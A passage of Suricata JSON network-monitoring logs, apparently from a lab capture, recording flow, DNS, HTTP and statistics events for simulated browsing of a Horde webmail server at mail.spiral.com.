ed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:19.000426+0000","flow_id":1587654728744039,"event_type":"flow","src_ip":"192.168.10.81","src_port":52718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":10,"bytes_toserver":1285,"bytes_toclient":8956,"start":"2020-02-29T00:11:13.392295+0000","end":"2020-02-29T00:11:18.677600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:20.598346+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54606,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21578,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:20.707223+0000","flow_id":1584978968453450,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54606,"proto":"UDP","dns":{"type":"answer","id":21578,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:20.796483+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34806,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607}} {"timestamp":"2020-02-29T00:12:21.000501+0000","flow_id":1599723571538018,"event_type":"flow","src_ip":"192.168.10.122","src_port":58451,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:20.223330+0000","end":"2020-02-29T00:07:20.332082+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:23.000191+0000","event_type":"stats","stats":{"uptime":14395,"capture":{"kernel_packets":134911,"kernel_drops":0},"decoder":{"pkts":134924,"bytes":93010920,"invalid":187,"ipv4":133435,"ipv6":8,"ethernet":134924,"raw":0,"null":0,"sll":0,"tcp":128167,"udp":5066,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2755,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2771,"synack":2762,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1796,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2313,"failed_udp":111},"tx":{"http":4623,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2393}},"flow_mgr":{"closed_pruned":2731,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20828,"memcap_state":0,"memcap_global":0},"http":{"memuse":76404,"memcap":0}}} {"timestamp":"2020-02-29T00:12:23.000978+0000","flow_id":1157088548497515,"event_type":"flow","src_ip":"192.168.10.130","src_port":34786,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":35,"bytes_toserver":4407,"bytes_toclient":36375,"start":"2020-02-29T00:10:16.600171+0000","end":"2020-02-29T00:11:22.851541+0000","age":66,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:23.001319+0000","flow_id":110654126986856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34788,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1276,"bytes_toclient":956,"start":"2020-02-29T00:10:22.824936+0000","end":"2020-02-29T00:11:22.851474+0000","age":60,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.000815+0000","flow_id":1212171508187051,"event_type":"flow","src_ip":"192.168.10.81","src_port":52720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":2320,"bytes_toclient":11299,"start":"2020-02-29T00:11:18.851883+0000","end":"2020-02-29T00:11:24.439161+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:25.801798+0000","flow_id":1144822130078229,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34806,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5607},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:12:27.645979+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54334,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:27.754252+0000","flow_id":1565664501029723,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42020,"proto":"UDP","dns":{"type":"answer","id":54334,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:27.914566+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34808,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663}} {"timestamp":"2020-02-29T00:12:30.000234+0000","event_type":"stats","stats":{"uptime":14402,"capture":{"kernel_packets":134931,"kernel_drops":0},"decoder":{"pkts":134947,"bytes":93020018,"invalid":187,"ipv4":133456,"ipv6":8,"ethernet":134947,"raw":0,"null":0,"sll":0,"tcp":128186,"udp":5068,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2756,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2772,"synack":2763,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1797,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2314,"failed_udp":111},"tx":{"http":4624,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2394}},"flow_mgr":{"closed_pruned":2734,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":111087,"memcap":0}}} {"timestamp":"2020-02-29T00:12:30.444193+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50639,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:30.552573+0000","flow_id":1009264372926241,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50814,"proto":"UDP","dns":{"type":"answer","id":50639,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:12:30.573910+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:12:32.000671+0000","flow_id":1771509394621068,"event_type":"flow","src_ip":"192.168.10.81","src_port":52722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:11:26.508556+0000","end":"2020-02-29T00:11:31.703191+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:32.915744+0000","flow_id":204108328578649,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34808,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6663},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31984,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.485767+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:12:34.494123+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39806,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.602655+0000","flow_id":1661936193407531,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56201,"proto":"UDP","dns":{"type":"answer","id":39806,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:12:34.669166+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":204,"tx_id":1}} {"timestamp":"2020-02-29T00:12:34.681377+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6800,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:34.789685+0000","flow_id":964081317209505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58854,"proto":"UDP","dns":{"type":"answer","id":6800,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:34.913434+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49577,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:34.923749+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240}} {"timestamp":"2020-02-29T00:12:35.000171+0000","flow_id":563408108453862,"event_type":"flow","src_ip":"192.168.10.130","src_port":34794,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:11:22.851942+0000","end":"2020-02-29T00:11:34.022594+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:35.000374+0000","flow_id":23852826892732,"event_type":"flow","src_ip":"192.168.10.122","src_port":43605,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.399804+0000","end":"2020-02-29T00:07:34.508268+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.000459+0000","flow_id":746339340518905,"event_type":"flow","src_ip":"192.168.10.122","src_port":54527,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:07:34.656889+0000","end":"2020-02-29T00:07:34.764835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:35.022032+0000","flow_id":1937329496453146,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38808,"proto":"UDP","dns":{"type":"answer","id":49577,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:35.103290+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34812,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819}} {"timestamp":"2020-02-29T00:12:37.000149+0000","event_type":"stats","stats":{"uptime":14409,"capture":{"kernel_packets":134980,"kernel_drops":0},"decoder":{"pkts":134986,"bytes":93032192,"invalid":187,"ipv4":133495,"ipv6":8,"ethernet":134986,"raw":0,"null":0,"sll":0,"tcp":128217,"udp":5076,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2758,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2774,"synack":2765,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1798,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2318,"failed_udp":111},"tx":{"http":4628,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2398}},"flow_mgr":{"closed_pruned":2735,"new_pruned":15,"est_pruned":2363,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":128024,"memcap":0}}} {"timestamp":"2020-02-29T00:12:38.000534+0000","flow_id":146057546899732,"event_type":"flow","src_ip":"192.168.10.130","src_port":34796,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":1149,"bytes_toclient":7663,"start":"2020-02-29T00:11:31.729364+0000","end":"2020-02-29T00:11:37.019380+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:38.435589+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54557,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:38.543962+0000","flow_id":2162338538366341,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38589,"proto":"UDP","dns":{"type":"answer","id":54557,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:38.698958+0000","flow_id":931899127526949,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7922}} {"timestamp":"2020-02-29T00:12:39.885858+0000","flow_id":858648459774048,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34810,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5240},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":24332,"tx_id":2}} {"timestamp":"2020-02-29T00:12:40.104202+0000","flow_id":454818455014582,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34812,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4819},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20386,"tx_id":0}} 